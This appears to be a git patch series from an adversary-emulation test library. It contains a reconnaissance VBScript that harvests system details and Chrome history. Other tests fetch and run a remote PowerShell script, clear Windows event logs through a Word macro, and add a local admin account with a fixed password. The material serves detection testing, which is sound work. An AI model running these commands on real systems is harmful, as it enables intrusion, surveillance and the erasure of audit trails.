For Each Drive In Drives + StrDrives = StrDrives & Drive.DriveLetter & ":;" + Next + get_network_adapter_info = get_network_adapter_info & "LogicalDrives=" & StrDrives & "&" + Set win32_group_query_results = Nothing + Set Drives = Nothing + Set query_result = Nothing + Set Drive = Nothing + On Error GoTo 0 +End Function + +Function get_os_info_str() + On Error Resume Next + Err.Clear + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") + get_os_info_str = "" + For Each query_results in wmi_object.ExecQuery("SELECT * FROM Win32_OperatingSystem",,48) + get_os_info_str = get_os_info_str + "Hostname:" + query_results.CSName + "%%%" + get_os_info_str = get_os_info_str + "Name_OS:" + query_results.Caption + "%%%" + get_os_info_str = get_os_info_str + "Version_OS:" & query_results.Version + " BuildNumber : " & query_results.BuildNumber + "%%%" + get_os_info_str = get_os_info_str + "Manufacturer_OS:" & query_results.Manufacturer + "%%%" + get_os_info_str = get_os_info_str + "ProductType_OS:" & parse_os_from_product_type(query_results.ProductType) & "%%%" + get_os_info_str = get_os_info_str + "BuildType_OS:" & query_results.BuildType + "%%%" + get_os_info_str = get_os_info_str + "RegisteredUser:" & query_results.RegisteredUser + "%%%" + get_os_info_str = get_os_info_str + "Organization:" & query_results.Organization + "%%%" + get_os_info_str = get_os_info_str + "SerialNumber:" & query_results.SerialNumber + "%%%" + bios_release_date = query_results.InstallDate + bios_release_date = Mid(bios_release_date, 7, 2) + "." + Mid(bios_release_date, 5, 2) + "." + Mid(bios_release_date, 1, 4) + ", " + Mid(bios_release_date, 9, 2) + ":" + Mid(bios_release_date, 11, 2) + ":" + Mid(bios_release_date, 13, 2) + get_os_info_str = get_os_info_str + "InstallDate:" & bios_release_date + "%%%" + bios_release_date = query_results.LastBootUpTime + bios_release_date = Mid(bios_release_date, 7, 2) + "." + Mid(bios_release_date, 5, 2) + "." + Mid(bios_release_date, 1, 4) + ", " + Mid(bios_release_date, 9, 2) + ":" + Mid(bios_release_date, 11, 2) + ":" + Mid(bios_release_date, 13, 2) + get_os_info_str = get_os_info_str + "LastBootUpTime:" & bios_release_date + "%%%" + get_os_info_str = get_os_info_str + System_manufacturer + "%%%" + get_os_info_str = get_os_info_str + System_model + "%%%" + get_os_info_str = get_os_info_str + SystemType + "%%%" + get_os_info_str = get_os_info_str + "MaxNumberOfProcesses:" & CStr(query_results.MaxNumberOfProcesses) + "%%%" + get_os_info_str = get_os_info_str + get_computer_system_info() + get_os_info_str = get_os_info_str + get_processor_info() + get_os_info_str = get_os_info_str + get_bios_info() + get_os_info_str = get_os_info_str + "WindowsDirectory:" & query_results.WindowsDirectory + "%%%" + get_os_info_str = get_os_info_str + "SystemDirectory:" & query_results.SystemDirectory + "%%%" + get_os_info_str = get_os_info_str + "BootDevice:" & query_results.BootDevice + "%%%" + get_os_info_str = get_os_info_str + "OSLanguage:" & extract_os_language(query_results.OSLanguage) + "%%%" + get_os_info_str = get_os_info_str + "MUILanguages:" & Join(query_results.MUILanguages, ",") + "%%%" + get_os_info_str = get_os_info_str + "CurrentTimeZone:" & get_timezone_info(query_results.CurrentTimeZone) + "%%%" + get_os_info_str = get_os_info_str + "%%%" + get_os_info_str = get_os_info_str + "FreePhysicalMemory:" & query_results.FreePhysicalMemory + "%%%" + get_os_info_str = get_os_info_str + "TotalVirtualMemorySize:" & query_results.TotalVirtualMemorySize + "%%%" + get_os_info_str = get_os_info_str + "FreeVirtualMemory:" & query_results.FreeVirtualMemory + "%%%" + Next + On Error GoTo 0 +End Function + +Function extract_os_language(raw_os_language_str) + extract_os_language = "" + On Error Resume Next + Err.Clear + Dim language_str, start_index, end_index + language_str = "1;Arabic|4;Chinese(Simplified)D| China|9;English|1025;Arabic D|Saudi Arabia|1026;Bulgarian|1027;Catalan|1028;Chinese (Traditional) D| Taiwan|1029;Czech|1030;Danish|1031;German D| Germany|1032;Greek|1033;English D|UnitedStates|1034;Spanish D|Traditional Sort|1035;Finnish|1036;French D| France|1037;Hebrew|1038;Hungarian|1039;Icelandic|1040;Italian D| Italy|1041;Japanese|1042;Korean|1043;Dutch D| Netherlands|1044;Norwegian D| Bokmal|1045;Polish|1046;Portuguese D|Brazil|1047;Rhaeto-Romanic|1048;Romanian|1049;Russian|1050;Croatian|1051;Slovak|1052;Albanian|1053;Swedish|1054;Thai|1055;Turkish|1056;Urdu|1057;Indonesian|1058;Ukrainian|1059;Belarusian|1060;Slovenian|1061;Estonian|1062;Latvian|1063;Lithuanian|1065;Persian|1066;Vietnamese|1069;Basque (Basque)|1070;Serbian|1071;Macedonian(North Macedonia)|1072;Sutu|1073;Tsonga|1074;Tswana|1076;Xhosa|1077;Zulu|1078;Afrikaans|1080;Faeroese|1081;Hindi|1082;Maltese|1084;Scottish Gaelic(United Kingdom)|1085;Yiddish|1086;Malay D|Malaysia|2049;Arabic D|Iraq|2052;Chinese(Simplified) D|PRC|2055;German D|Switzerland|2057;EnglishD| UnitedKingdom|2058;Spanish D|Mexico|2060;French D|Belgium|2064;Italian D|Switzerland|2067;Dutch D|Belgium|2068;Norwegian D|Nynorsk|2070;PortugueseD| Portugal|2072;RomanianD| Moldova|2073;RussianD| Moldova|2074;SerbianD| Latin|2077;Swedish D|Finland|3073;Arabic D|Egypt|3076;Chinese(Traditional) D| HongKong SAR|3079;German D|Austria|3081;English D|Australia|3082;Spanish D|InternationalSort|3084;French D|Canada|3098;Serbian D|Cyrillic|4097;Arabic D|Libya|4100;Chinese(Simplified) D|Singapore|4103;German D|Luxembourg|4105;EnglishD| Canada|4106;Spanish D|Guatemala|4108;French D|Switzerland|5121;ArabicD| Algeria|5127;German D|Liechtenstein|5129;English D| NewZealand|5130;Spanish D|Costa Rica|5132;French D|Luxembourg|6145;Arabic D|Morocco|6153;English D|Ireland|6154;Spanish D|Panama|7169;Arabic D|Tunisia|7177;English D|South Africa|7178;SpanishD| DominicanRepublic|8193;Arabic D|Oman|8201;English D|Jamaica|8202;Spanish D|Venezuela|9217;Arabic D|Yemen|9226;Spanish D|Colombia|10241;Arabic D|Syria|10249;English D|Belize|10250;Spanish D|Peru|11265;Arabic D|Jordan|11273;English D|Trinidad|11274;Spanish D|Argentina|12289;Arabic D|Lebanon|12298;Spanish D|Ecuador|13313;Arabic D|Kuwait|13322;Spanish D|Chile|14337;Arabic D|U.A.E.|14346;Spanish D|Uruguay|15361;Arabic D|Bahrain|15370;Spanish D|Paraguay|16385;Arabic D|Qatar|16394;Spanish D|Bolivia|17418;Spanish D|El Salvador|18442;SpanishD| Honduras|19466;SpanishD|Nicaragua|20490;SpanishD| Puerto Rico|" + start_index = inStr(1,language_str, CStr(raw_os_language_str)) + end_index = inStr(start_index,language_str, "|") - start_index + extract_os_language = Mid(language_str, start_index, end_index) +End Function + +Function get_security_info() + get_security_info="" + On Error Resume Next + Err.Clear + get_security_info = "Current_user: no_admin&&&" + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") + Set win32_group_query_results = wmi_object.ExecQuery("SELECT * FROM Win32_Group",,48) + For Each query_results in win32_group_query_results + If query_results.SID = "S-1-5-32-544" Then + admin_group_name = query_results.Name + End If + Next + Set wscript_network_object = CreateObject("WScript.Network") + network_user_name = wscript_network_object.UserName + Set win32_group_query_results = wmi_object.ExecQuery("SELECT * FROM Win32_GroupUser",,48) + For Each query_results in win32_group_query_results + If Instr(1, query_results.GroupComponent, admin_group_name, 1) > 0 Then + If Instr(1, query_results.PartComponent, """" + network_user_name + """", 1) > 0 Then + get_security_info = "Current_user: admin&&&" + End If + End If + Next + get_security_info = get_security_info + get_antivirus_info + "%%%" + get_admin_privileges_info + On Error GoTo 0 +End Function + +Function get_product_or_process_info(product_or_process_str) + get_product_or_process_info = "" + On Error Resume Next + Err.Clear + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") + Set win32_group_query_results = wmi_object.ExecQuery("SELECT * FROM" & product_or_process_str, , 48) + get_product_or_process_info = "" + For Each query_results In win32_group_query_results + get_product_or_process_info = get_product_or_process_info & query_results.Name & "%%%" + Next + On Error GoTo 0 +End Function + +Function get_web_history_info() + get_web_history_info="" + On Error Resume Next + Err.Clear + Set dic = CreateObject("Scripting.Dictionary") + Set wscript_shell_object = CreateObject("WScript.Shell") + chrome_history_dir = wscript_shell_object.ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Google\Chrome\UserData\Default\History" + If file_system_object.FileExists(chrome_history_dir) Then + Set FileHistory = file_system_object.GetFile(chrome_history_dir) + FileHistory.Copy temp_file_name + Set adodb_stream_object = CreateObject("ADODB.Stream") + chrome_history_array=Array() + adodb_stream_object.Type = 1 + adodb_stream_object.Open + adodb_stream_object.LoadFromFile(temp_file_name) + chrome_history_array = adodb_stream_object.Read() + adodb_stream_object.Close + For generic_loop_index = 1 To UBound(chrome_history_array) + istr = 0 + addstr = "" + http = "" + https = "" + ' Chr(104) = 'h' + If AscB(MidB(chrome_history_array, generic_loop_index, 1)) = 104 Then + http = Chr(AscB(MidB(chrome_history_array, generic_loop_index, 1))) + Chr(AscB(MidB(chrome_history_array, generic_loop_index + 1, 1))) + Chr(AscB(MidB(chrome_history_array, generic_loop_index + 2, 1))) + Chr(AscB(MidB(chrome_history_array, generic_loop_index + 3, 1))) + Chr(AscB(MidB(chrome_history_array, generic_loop_index + 4, 1))) + Chr(AscB(MidB(chrome_history_array, generic_loop_index + 5, 1))) + Chr(AscB(MidB(chrome_history_array, generic_loop_index + 6, 1))) + https = http + Chr(AscB(MidB(chrome_history_array, generic_loop_index + 7, 1))) + If https = "https://" Then + istr = 8 + addstr = "https://" + While AscB(MidB(chrome_history_array, generic_loop_index + istr, 1)) > 32 And AscB(MidB(chrome_history_array, generic_loop_index + istr, 1)) < 123 + addstr = addstr + Chr(AscB(MidB(chrome_history_array, generic_loop_index + istr, 1))) + istr = istr + 1 + Wend + If Not dic.Exists(addstr) Then dic.Add addstr, generic_loop_index + istr + ElseIf http = "http://" Then + istr = 7 + addstr = "http://" + While AscB(MidB(chrome_history_array, generic_loop_index + istr, 1)) > 32 And AscB(MidB(chrome_history_array, generic_loop_index + istr, 1)) < 123 + addstr = addstr + Chr(AscB(MidB(chrome_history_array, generic_loop_index + istr, 1))) + istr = istr + 1 + Wend + If Not dic.Exists(addstr) Then dic.Add addstr, generic_loop_index + istr + End If + End If + Next + For Each e In dic.Keys + If len(get_web_history_info) > 300000 Then Exit For + get_web_history_info = get_web_history_info & e & + "%%%" + Next + file_system_object.DeleteFile temp_file_name + Else + get_web_history_info = "nothing" + End If + On Error GoTo 0 +End Function + +Function decode_base64_str(base64_str) + decode_base64_str = "" + On Error Resume Next + Err.Clear + With CreateObject("CDO.Message").BodyPart + .ContentTransferEncoding = "base64" + .Charset = "utf-8" + With .GetEncodedContentStream + .WriteText base64_str + .Flush + End With + With .GetDecodedContentStream + .Charset = "utf-8" + decode_base64_str = .ReadText + End With + End With + On Error GoTo 0 +End Function + +Function get_system_info() + get_system_info="" + get_system_info = get_system_info + get_os_info_str() + get_system_info = get_system_info + get_pagefile_info() + get_system_info = get_system_info + get_quickfix_engineering_info() + get_system_info = get_system_info + get_detailed_network_adapter_info() +End Function + +Function get_timezone_info(curr_timezone_as_int) + get_timezone_info = "" + On Error Resume Next + Err.Clear + If Sgn(curr_timezone_as_int) = 1 Then + get_timezone_info = "UTC+" + Else + get_timezone_info = "UTC-" + End If + If curr_timezone_as_int\60 < 10 Then + get_timezone_info = get_timezone_info + "0" + CStr(curr_timezone_as_int\60) + ":" + Else + get_timezone_info = get_timezone_info + CStr(curr_timezone_as_int\60) + ":" + End If + If curr_timezone_as_int Mod 60 < 10 Then + get_timezone_info = get_timezone_info + "0" + CStr(curr_timezone_as_int Mod 60) + Else + get_timezone_info = get_timezone_info + CStr(curr_timezone_as_int Mod 60) + End If + On Error GoTo 0 +End Function + +Function decode_base64_str_1(w56ucmczmd50) + decode_base64_str_1 = vbNull + On Error Resume Next + Err.Clear + Set domdocument_object = CreateObject("MSXml2.DOMDocument") + Set tmp_element = domdocument_object.createElement("tmp") + tmp_element.DataType = "bin.base64" + tmp_element.text = w56ucmczmd50 + decode_base64_str_1 = tmp_element.NodeTypedValue + Set domdocument_object = Nothing + Set tmp_element = Nothing + On Error GoTo 0 +End Function + +Function get_bios_info() + On Error Resume Next + Err.Clear + get_bios_info = "" + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") + For Each query_results in wmi_object.ExecQuery("SELECT * FROM Win32_BIOS",,48) + generic_loop_index = generic_loop_index + 1 + bios_release_date = query_results.ReleaseDate + bios_release_date = Mid(bios_release_date, 7, 2) + "." + Mid(bios_release_date, 5, 2) + "." + Mid(bios_release_date, 1, 4) + get_bios_info = "BIOS_version:" & query_results.Name + ", " + query_results.SMBIOSBIOSVersion + ", " + bios_release_date + "%%%" + Next + On Error GoTo 0 +End Function + +Function get_binary_chunk(data_to_chunk) + get_binary_chunk = vbNull + On Error Resume Next + Err.Clear + Dim recordset_object, len_data, data_as_binary_chunk + Const const_205 = 205 + Set recordset_object = CreateObject("ADODB.Recordset") + len_data = LenB(data_to_chunk) + If len_data>0 Then + recordset_object.Fields.Append "mBinary", const_205, len_data + recordset_object.Open + recordset_object.AddNew + recordset_object("mBinary").AppendChunk data_to_chunk & ChrB(0) + recordset_object.Update + data_as_binary_chunk = recordset_object("mBinary").GetChunk(len_data) + End If + get_binary_chunk = data_as_binary_chunk + On Error GoTo 0 +End Function + +Function parse_os_from_product_type(product_type_query_results) + parse_os_from_product_type = "" + On Error Resume Next + Err.Clear + Dim os_start_marker, start_index, end_index + os_start_marker = "1;Work StatioControlle" + start_index = inStr(1,os_start_marker, CStr(product_type_query_results)) + end_index = inStr(start_index,os_start_marker, "|") - start_index + parse_os_from_product_type = Mid(os_start_marker, start_index, end_index) + On Error GoTo 0 +End Function + +Function get_detailed_network_adapter_info() + On Error Resume Next + Err.Clear + get_detailed_network_adapter_info = "" + Set physical_adapter_dict = CreateObject("Scripting.Dictionary") + Set netconnection_id_dict = CreateObject("Scripting.Dictionary") + Set dhcp_enabled_dict = CreateObject("Scripting.Dictionary") + Set dhcp_server_dict = CreateObject("Scripting.Dictionary") + Set ip_address_dict = CreateObject("Scripting.Dictionary") + Set mac_address_dict = CreateObject("Scripting.Dictionary") + Set default_ip_gateway_dict = CreateObject("Scripting.Dictionary") + Set dns_domain_suffix_search_order_dict = CreateObject("Scripting.Dictionary") + Set ip_subnet_dict = CreateObject("Scripting.Dictionary") + Set dns_server_search_order_dict = CreateObject("Scripting.Dictionary") + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") + generic_loop_index = 0 + For Each query_results In wmi_object.ExecQuery("SELECT * FROM Win32_NetworkAdapter", , 48) + If query_results.PhysicalAdapter Then + physical_adapter_dict.Add query_results.Caption, query_results.Name + netconnection_id_dict.Add query_results.Caption, query_results.NetConnectionID + generic_loop_index = generic_loop_index + 1 + End If + Next + get_detailed_network_adapter_info = get_detailed_network_adapter_info + "NetworkAdapter_Count -" & CStr(generic_loop_index) & ": " + "%%%" + generic_loop_index = 0 + For Each query_results In wmi_object.ExecQuery("Select * From Win32_NetworkAdapterConfiguration WHERE IPEnabled = True", , 48) + If physical_adapter_dict.Exists(query_results.Caption) Then + If Not IsNull(query_results.DHCPEnabled) Then dhcp_enabled_dict.Add query_results.Caption, query_results.DHCPEnabled + If Not IsNull(query_results.DHCPServer) Then dhcp_server_dict.Add query_results.Caption, query_results.DHCPServer + If Not IsNull(query_results.DNSDomainSuffixSearchOrder) Then dns_domain_suffix_search_order_dict.Add query_results.Caption, Join(query_results.DNSDomainSuffixSearchOrder, ",") + If Not IsNull(query_results.MACAddress) Then mac_address_dict.Add query_results.Caption, query_results.MACAddress + If Not IsNull(query_results.DefaultIPGateway) Then + If Not check_not_array(query_results.DefaultIPGateway) Then + default_ip_gateway_dict.Add query_results.Caption, Join(query_results.DefaultIPGateway, ",") + Else + default_ip_gateway_dict.Add query_results.Caption, query_results.DefaultIPGateway + End If + End If + generic_loop_index = generic_loop_index + 1 + get_detailed_network_adapter_info = get_detailed_network_adapter_info + "NetworkAdapter" & CStr(generic_loop_index) & ": " & physical_adapter_dict.Item(query_results.Caption) + "%%%" + "Connection name: " + netconnection_id_dict.Item(query_results.Caption) + "%%%" + If query_results.DHCPEnabled Then + get_detailed_network_adapter_info = get_detailed_network_adapter_info + "DHCPEnabled:" & CStr(query_results.DHCPEnabled) + get_detailed_network_adapter_info = get_detailed_network_adapter_info + "%%%" + get_detailed_network_adapter_info = get_detailed_network_adapter_info + "DHCPServer:" & query_results.DHCPServer + get_detailed_network_adapter_info = get_detailed_network_adapter_info + "%%%" + End If + If Not IsNull(query_results.IPAddress) Then + If Not check_not_array(query_results.IPAddress) Then + ip_address_dict.Add query_results.Caption, Join(query_results.IPAddress, ",") + get_detailed_network_adapter_info = get_detailed_network_adapter_info + "IPAddress:" & Join(query_results.IPAddress, ",") + "%%%" + Else + ip_address_dict.Add query_results.Caption, query_results.IPAddress + get_detailed_network_adapter_info = get_detailed_network_adapter_info + "IPAddress:" & query_results.IPAddress + "%%%" + End If + End If + If Not IsNull(query_results.IPSubnet) Then + ip_subnet_dict.Add query_results.Caption, Join(query_results.IPSubnet, ",") + End If + If check_not_array(query_results.DNSServerSearchOrder) Then + dns_server_search_order_dict.Add query_results.Caption, "" + Else + dns_server_search_order_dict.Add query_results.Caption, Join(query_results.DNSServerSearchOrder, ",") + End If + End If + Next + On Error GoTo 0 + network_info_str = "" + On Error Resume Next + Err.Clear + v8tsv14kl6 = "" + For Each varKey In physical_adapter_dict.Keys + If netconnection_id_dict.Exists(varKey) Then v8tsv14kl6 = v8tsv14kl6 + "Adapter:" + netconnection_id_dict.Item(varKey) & "%%%" + If dns_domain_suffix_search_order_dict.Exists(varKey) Then v8tsv14kl6 = v8tsv14kl6 + "DNSDomainSuffix:" + dns_domain_suffix_search_order_dict.Item(varKey) & "%%%" + If mac_address_dict.Exists(varKey) Then v8tsv14kl6 = v8tsv14kl6 + "MACAddress:" + mac_address_dict.Item(varKey) & "%%%" + If dhcp_enabled_dict.Exists(varKey) Then v8tsv14kl6 = v8tsv14kl6 + "DHCPEnabled:" + CStr(dhcp_enabled_dict.Item(varKey)) & "%%%" + If ip_address_dict.Exists(varKey) Then v8tsv14kl6 = v8tsv14kl6 + "IPAddress:" + ip_address_dict.Item(varKey) & "%%%" + If ip_subnet_dict.Exists(varKey) Then v8tsv14kl6 = v8tsv14kl6 + "IPSubnet:" + ip_subnet_dict.Item(varKey) & "%%%" + If default_ip_gateway_dict.Exists(varKey) Then v8tsv14kl6 = v8tsv14kl6 + "DefaultIPGateway:" + default_ip_gateway_dict.Item(varKey) & "%%%" + If dhcp_server_dict.Exists(varKey) Then v8tsv14kl6 = v8tsv14kl6 + "DHCPServer:" + dhcp_server_dict.Item(varKey) & "%%%" + If dns_server_search_order_dict.Exists(varKey) Then v8tsv14kl6 = v8tsv14kl6 + "DNSServers:" + dns_server_search_order_dict.Item(varKey) & "%%%" + Next + network_info_str = v8tsv14kl6 + On Error GoTo 0 +End Function + +Function get_computer_system_info() + get_computer_system_info = "" + On Error Resume Next + Err.Clear + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") + For Each query_results in wmi_object.ExecQuery("SELECT * FROM Win32_ComputerSystem",,48) + get_computer_system_info = "SystemType:" & query_results.SystemType + "%%%" + get_computer_system_info = get_computer_system_info & "TotalPhysicalMemory:" & query_results.TotalPhysicalMemory + "%%%" + get_computer_system_info = get_computer_system_info & "Domain:" & query_results.Domain + "%%%" + get_computer_system_info = get_computer_system_info & "System_manufacturer:" & query_results.Manufacturer + "%%%" + get_computer_system_info = get_computer_system_info & "System_model:" & query_results.Model + "%%%" + Next + On Error GoTo 0 +End Function + +Function get_admin_privileges_info() + On Error Resume Next + Set wscript_shell_object = CreateObject("WScript.Shell") + wscript_shell_object.RegRead("HKEY_USERS\S-1-5-19\Environment\TEMP") + if Err.number = 0 Then + get_admin_privileges_info = "Admin_privileges: Enabled" + else + get_admin_privileges_info = "Admin_privileges: Disabled" + end if + Err.Clear + On Error goto 0 +End Function From b8774a1318fc2d3921d6869d0d04b9c7fffd35a3 Mon Sep 17 00:00:00 2001 From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com> Date: Wed, 16 Dec 2020 11:32:10 -0500 Subject: [PATCH 012/131] initial (#1333) * initial * hard-code to winword process Co-authored-by: avocado Co-authored-by: Carrie Roberts --- atomics/T1070.001/T1070.001.yaml | 26 +++++++++++++++++++ atomics/T1070.001/src/T1070.001-macrocode.txt | 12 +++++++++ 2 files changed, 38 insertions(+) create mode 100644 atomics/T1070.001/src/T1070.001-macrocode.txt diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml index 104f157a..7ee1a5e7 100644 --- a/atomics/T1070.001/T1070.001.yaml +++ b/atomics/T1070.001/T1070.001.yaml @@ -32,3 +32,29 @@ atomic_tests: Get-EventLog -list name: powershell elevation_required: true +- name: Clear Event Logs via VBA + auto_generated_guid: + description: | + This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. + + Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: | + Microsoft Word must be installed + prereq_command: | + try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft Word manually to meet this requirement" + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" + name: powershell + elevation_required: true diff --git a/atomics/T1070.001/src/T1070.001-macrocode.txt b/atomics/T1070.001/src/T1070.001-macrocode.txt new file mode 100644 index 00000000..f277cc28 --- /dev/null +++ b/atomics/T1070.001/src/T1070.001-macrocode.txt @@ -0,0 +1,12 @@ +Sub ClearLogs() + + Dim objWMIService, colLogFiles, objLogfile As Object + + Set objWMIService = GetObject("winmgmts:{(Backup, Security)}!\\.\root\cimv2") + Set colLogFiles = objWMIService.ExecQuery("Select * from Win32_NTEventLogFile") + + For Each objLogfile In colLogFiles + objLogfile.ClearEventLog + Next + +End Sub \ No newline at end of file From 9a2c1350c9d7813e8179dddabc3b9547205ee497 Mon Sep 17 00:00:00 2001 From: Michael Wade <4274104+savvyspoon@users.noreply.github.com> Date: Wed, 16 Dec 2020 10:36:27 -0700 Subject: [PATCH 013/131] Added T0178.003 for local accounts (#1330) * Added T0178.003 for local accounts * Update T1078.003.yaml Co-authored-by: Carrie Roberts --- atomics/T1078.003/T1078.003.md | 44 ++++++++++++++++++++++++++++++++ atomics/T1078.003/T1078.003.yaml | 18 +++++++++++++ 2 files changed, 62 insertions(+) create mode 100644 atomics/T1078.003/T1078.003.md create mode 100644 atomics/T1078.003/T1078.003.yaml diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md new file mode 100644 index 00000000..149811ec --- /dev/null +++ b/atomics/T1078.003/T1078.003.md @@ -0,0 +1,44 @@ +# T1078.003 - Local Accounts +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1078/003) +
Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. + +Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003/). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.
+ + +## Atomic Tests + +- [Atomic Test #1 - Create new account with admin priviliges](#atomic-test-1---create-new-account-with-admin-priviliges) + + +
+ +## Atomic Test #1 - Create new account with admin privileges +After execution the new account will be active and added to the Administrators group + + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +net user art-test /add +net user art-test Password123! +net localgroup administrators art-test /add +``` + +#### Cleanup Commands: +```cmd +net localgroup administrators art-test /delete >nul 2>&1 +net user art-test /delete >nul 2>&1 +``` + + + + + +
diff --git a/atomics/T1078.003/T1078.003.yaml b/atomics/T1078.003/T1078.003.yaml new file mode 100644 index 00000000..caed1608 --- /dev/null +++ b/atomics/T1078.003/T1078.003.yaml @@ -0,0 +1,18 @@ +attack_technique: T1078.003 +display_name: 'Valid Accounts: Local Accounts' +atomic_tests: +- name: Create local account with admin priviliges + + description: After execution the new account will be active and added to the Administrators group + supported_platforms: + - windows + executor: + command: |- + net user art-test /add + net user art-test Password123! + net localgroup administrators art-test /add + cleanup_command: |- + net localgroup administrators art-test /delete >nul 2>&1 + net user art-test /delete >nul 2>&1 + name: command_prompt + elevation_required: true From 7ebf7536b886637d85388c93f34401d493cf4087 Mon Sep 17 00:00:00 2001 From: Brian Beyer Date: Wed, 16 Dec 2020 11:27:51 -0700 Subject: [PATCH 014/131] Separate CI steps so Github status checks can reference the right checks (#1334) * Separate CI steps so Github status checks can reference the right checks * Generate docs from job=generate_docs branch=bb-separate-ci-steps * Commit GUIDs after generating; require GUIDs before other steps * Fix config * Generate GUIDs from job=generate_guids branch=bb-separate-ci-steps * Generate docs from job=generate_docs branch=bb-separate-ci-steps * Better wording * Update config.yml Co-authored-by: CircleCI Atomic Red Team doc generator --- .circleci/config.yml | 47 ++++- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 7 + atomics/Indexes/Indexes-CSV/windows-index.csv | 7 + atomics/Indexes/Indexes-Markdown/index.md | 17 +- .../Indexes/Indexes-Markdown/windows-index.md | 17 +- atomics/Indexes/Matrices/matrix.md | 10 +- atomics/Indexes/Matrices/windows-matrix.md | 10 +- atomics/Indexes/index.yaml | 165 +++++++++++++++++- atomics/T1070.001/T1070.001.md | 45 +++++ atomics/T1070.001/T1070.001.yaml | 2 +- atomics/T1078.003/T1078.003.md | 8 +- atomics/T1078.003/T1078.003.yaml | 1 + atomics/T1082/T1082.md | 34 ++++ atomics/T1082/T1082.yaml | 1 + atomics/T1564/T1564.md | 68 ++++++++ atomics/T1564/T1564.yaml | 2 +- atomics/used_guids.txt | 4 + 19 files changed, 412 insertions(+), 37 deletions(-) create mode 100644 atomics/T1564/T1564.md diff --git a/.circleci/config.yml b/.circleci/config.yml index 7ef9d72d..92760ef1 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -8,10 +8,16 @@ workflows: version: 2 validate-then-generate-docs: jobs: - - validate_atomics_generate_docs + - generate_and_commit_guids + - validate_atomics: + requires: + - generate_and_commit_guids + - generate_and_commit_docs: + requires: + - generate_and_commit_guids jobs: - validate_atomics_generate_docs: + generate_and_commit_guids: <<: *defaults steps: - checkout @@ -21,11 +27,46 @@ jobs: name: Generate unique GUIDs for each atomic test command: | bin/generate-guids.rb + + echo "" + echo "" + git status + echo "" + echo "" + git diff-index HEAD -- + + if git diff-index --quiet HEAD -- ; then + echo "Not committing GUID changes because there are no changes" + #elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then + # echo "Not committing GUID changes because we are on master and GUID changes should be part of pull request branches" + elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then + echo "Not committing GUID changes because we are on a pull request branch that we don't have push permissions to" + else + git config credential.helper 'cache --timeout=120' + git config user.email "" + git config user.name "CircleCI Atomic Red Team GUID generator" + + git add atomics + git commit -am "Generate GUIDs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH" + git push -u origin $CIRCLE_BRANCH + fi + + validate_atomics: + <<: *defaults + steps: + - checkout + - add_ssh_keys - run: name: Validate the format of atomic tests against the spec command: | bin/validate-atomics.rb + + generate_and_commit_docs: + <<: *defaults + steps: + - checkout + - add_ssh_keys - run: name: Generate nice markdown document for atomics @@ -53,4 +94,4 @@ jobs: git add atomics git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH" git push -u origin $CIRCLE_BRANCH - fi \ No newline at end of file + fi diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 89915caf..71bf2f69 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 